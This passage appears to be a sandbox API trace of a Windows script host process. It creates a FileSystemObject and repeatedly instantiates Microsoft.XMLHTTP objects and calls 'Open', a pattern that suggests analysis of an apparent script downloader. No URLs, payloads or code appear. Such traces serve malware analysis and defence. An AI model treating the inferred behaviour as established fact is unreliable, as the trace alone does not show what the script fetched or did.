	[0441.092] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0441.092] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0441.092] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0441.092] SysStringLen (param_1=0x0) returned 0x0
	[0441.092] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0441.095] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0441.095] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0441.095] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0441.095] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0441.095] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0441.095] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0441.438] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0441.438] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0441.438] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0441.440] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0441.440] SysStringLen (param_1=0x0) returned 0x0
	[0441.440] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0441.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0441.440] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0441.440] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0441.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0441.440] ??2@YAPEAX_K@Z () returned 0x62f330
	[0441.440] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f330) 
	[0441.440] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0441.440] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0441.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0441.440] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0441.441] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0441.441] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0441.443] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0441.443] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0441.443] SysStringLen (param_1=0x0) returned 0x0
	[0441.443] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0441.443] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0441.443] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0441.443] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0441.443] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0441.444] ??2@YAPEAX_K@Z () returned 0x62f310
	[0441.444] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0441.444] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0441.444] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0441.444] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0441.444] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0441.444] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0441.444] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0441.444] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0441.444] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0441.444] SysStringLen (param_1=0x0) returned 0x0
	[0441.444] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0441.444] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0441.444] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0441.444] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0441.444] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0441.444] ??2@YAPEAX_K@Z () returned 0x62f330
	[0441.445] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0441.445] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0441.445] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0441.445] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0441.445] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0441.445] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0441.445] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0441.445] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0441.445] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0441.445] SysStringLen (param_1=0x0) returned 0x0
	[0441.445] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0441.445] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0441.445] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0441.445] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0441.445] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0441.445] ??2@YAPEAX_K@Z () returned 0x62f310
	[0441.445] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0441.445] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0441.446] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0441.446] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0441.446] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0441.446] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0441.446] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0441.446] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0441.446] longjmp () 
	[0441.446] longjmp () 
	[0441.446] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0441.446] SysStringLen (param_1=0x0) returned 0x0
	[0441.446] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0441.446] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0441.446] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0441.446] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0441.446] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0441.446] ??2@YAPEAX_K@Z () returned 0x62f330
	[0441.447] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0441.447] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0441.447] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0441.447] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0441.447] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0441.447] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0441.447] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0441.447] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0441.447] longjmp () 
	[0441.447] longjmp () 
	[0441.447] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0441.447] SysStringLen (param_1=0x0) returned 0x0
	[0441.447] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0441.447] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
